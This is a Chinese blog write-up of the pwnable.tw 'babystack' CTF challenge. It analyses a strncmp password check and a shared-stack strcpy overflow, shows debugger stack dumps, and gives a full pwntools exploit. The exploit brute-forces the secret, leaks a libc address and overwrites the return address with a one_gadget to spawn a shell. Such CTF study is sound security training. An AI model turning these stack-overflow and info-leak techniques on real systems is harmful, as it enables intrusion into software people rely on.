Pwnable.tw babystack

Pwnable.tw babystack

远程搞我心态🤬,收发改了半天,但漏洞点还是挺细节的。

程式一开始先生成长度0x10的随机数并放在rbp-0x20的位置,并在bss上备份。
之后是菜单选项:

1是login要求我们输入password并根据我们输入的password的长度来和栈中相应位置进行比较。

1
2
3
4
5
6
7
8
9
10
11
12
13
int __fastcall login(const char *a1)
{
  size_t v1; // rax
  char s; // [rsp+10h] [rbp-80h]

  printf("Your passowrd :");
  read_n((unsigned __int8 *)&s, 0x7Fu);
  v1 = strlen(&s);
  if ( strncmp(&s, a1, v1) )
    return puts("Failed !");
  flag = 1;
  return puts("Login Success !");
}

这里有2个想法:
1.可以通过strncmp依次比较来爆破出password。2.strncmp(&s, a1, v1),&s是我们的输入,在第一个参数,可通过输入’\x00’直接使其返回为0,login成功。

login之后我们就可以执行2的copy操作:

1
2
3
4
5
6
7
8
9
int __fastcall sub_E76(char *a1)
{
  char src; // [rsp+10h] [rbp-80h]

  printf("Copy :");
  read_n((unsigned __int8 *)&src, 0x3Fu);
  strcpy(a1, &src);
  return puts("It is magic copy !");
}

为啥是magic copy?除了strcpy有点可疑,但也没明显的漏洞。

看了一遍下来除了爆破出password外没啥想法了🤦

之后一次偶然的尝试在得到password后由于我又多输入’a’*0x50,在copy执行strcpy之后返回主函数发现password被改为’a’了!!!

仔细调试在汇编里发现问题:

1
2
3
4
5
6
7
8
9
10
login函数的栈帧:

.text:0000000000000DEF                 push    rbp
.text:0000000000000DF0                 mov     rbp, rsp
.text:0000000000000DF3                 sub     rsp, 90h

copy函数的栈帧:
.text:0000000000000E76                 push    rbp
.text:0000000000000E77                 mov     rbp, rsp
.text:0000000000000E7A                 sub     rsp, 90h

主调用函数都是main函数,这意味着login()和copy()函数是公用一个栈的!!!!

这样就能解释通了,在login()里输入的’a’会残存在栈里,当copy()再次用到这部分栈是,本是想利用read_n((unsigned __int8 *)&src, 0x3Fu);最多输入0x3f那最后一个就是’\x00’来截断,但实际上栈里该处的位置已经被写入了’a’,可导致在strcpy时main函数的栈溢出。

思路有了,但没地址,肯定有办法泄露的。

想到password是通过strncmp的比较来获得的,且比较的长度可控,那我们也能用相同的办法泄露出stack里的地址。

这里我的思路的login时输入’\x00’+’1’*87,这样既能login成功又能改password为’1’*0x10,但为什么是87个呢,一方面是为了strcpy改password,另一个是由于在输入这么多的长度时,main函数stack里的passwoed(被改了的)后面会写入stdvbuf的地址!(至于为什么会写入这个地址,个人想法可能时执行了对输入流初始相关的操作,还有待研究),那这样的话就能通过再次login来leak出Libc地址。

1
2
3
4
5
6
7
8
9
10
pwndbg> stack 50
00:0000│ rsp  0x7ffd0e102f00 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓
07:0038│      0x7ffd0e102f38 ◂— 0x3161616161616161 ('aaaaaaa1')
08:0040│      0x7ffd0e102f40 ◂— 0x3131313131313131 ('11111111')  //password
... ↓
0a:0050│ rsi  0x7ffd0e102f50 ◂— 0x3131313131310a31 ('1\n111111')
0b:0058│      0x7ffd0e102f58 —▸ 0x7fdc09940fb4 (setvbuf+324) ◂— 0xfc085480b8bd231
0c:0060│ rbp  0x7ffd0e102f60 —▸ 0x5555a2d50060 ◂— 0x41ff894156415741
0d:0068│      0x7ffd0e102f68 —▸ 0x7fdc098f1830 (__libc_start_main+240) ◂

如果只是改password,而没向下继续覆盖的话是这样的:

1
2
3
4
5
6
7
8
9
pwndbg> stack 50
00:0000│ rsp  0x7ffc3b4fb510 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓
07:0038│      0x7ffc3b4fb548 ◂— 0x3161616161616161 ('aaaaaaa1')
08:0040│      0x7ffc3b4fb550 ◂— 0x3131313131313131 ('11111111')
... ↓
0a:0050│ rsi  0x7ffc3b4fb560 ◂— 0x7fac80980a31
0b:0058│      0x7ffc3b4fb568 ◂— 0x0
0c:0060│ rbp  0x7ffc3b4fb570 —▸ 0x55c28958a060 ◂— 0x41ff894156415741

0x7fac80980a31这个地址看着像Libc里的,但实际上他和Libc的偏移是不固定的。

万事具备了,接下来就是在login时构造好stack,在copy里执行strcpy时将正确的password写入对应位置(退出时会和bss上备份的比较),并改ret_addr为one_gadget🚩

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import *
context.log_level='debug'
context.arch='amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def get_password(len, flag=False):
    secret=""
    for i in range(len):
        for j in range(0x1,0x100):
            if flag is True and j == 0x10:
                continue
            p.recvuntil(">> ")
            p.sendline("1")
            p.recvuntil("Your passowrd :")
            temp = secret+chr(j)+"\x00"
            p.sendline(temp)
            recv = p.recvuntil("\n")
            if "Success" in recv:
                secret += chr(j)
                log.success("password: "+secret)
                p.recvuntil(">> ")
                p.sendline("1")
                break
    return secret

def main(host,port=1234):
    global p
    if host:
        p=remote(host,port)
    else:
        p=process("./babystack",env={"LD_PRELOAD":"./libc_64.so.6"})


	secret=get_password(0x10)
	# debug(0x000000FA6)
	p.recvuntil(">> ")
	p.sendline(str(1))
	p.recvuntil(":")
	p.send('\x00'+'1'*(47+32))
	p.recvuntil(">> ")
	p.sendline('3')
	p.recvuntil(":")
	p.send('a'*0x3f)
	p.recvuntil(">> ")
	p.sendline('1')
	guess='1'*0x11+'\n'+'1'*6

	for _ in range(0x6):
	    for i in range(0x1,0x100):
	        p.recvuntil(">> ")
	        p.sendline(str(1))
	        p.recvuntil(":")
	        p.send(guess+chr(i)+'\x00')
	        recv=p.recvuntil("\n")
	        if 'Success' in recv:
	            guess+=chr(i)
	            success("guess: "+guess)
	            p.recvuntil(">> ")
	            p.sendline(str(1))
	            break
	libc.address=u64(guess[24:].ljust(8,'\x00'))-0x06ffb4
	success("libc: "+hex(libc.address))
	one_gadget=libc.address+0xf0567

	p.recvuntil(">> ")
	p.sendline(str(1))
	p.recvuntil(":")
	p.send('\x00'+'a'*0x3f+secret+'a'*0x18+p64(one_gadget))
	p.recvuntil(">> ")
	p.sendline(str(3))
	p.recvuntil(":")
	p.send('a'*0x3f)
    # gdb.attach(p)
	p.recvuntil(">> ")
	p.sendline(str(2))
    p.interactive()

if __name__ == '__main__':
    libc=ELF("./libc_64.so.6")
    main(0)

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>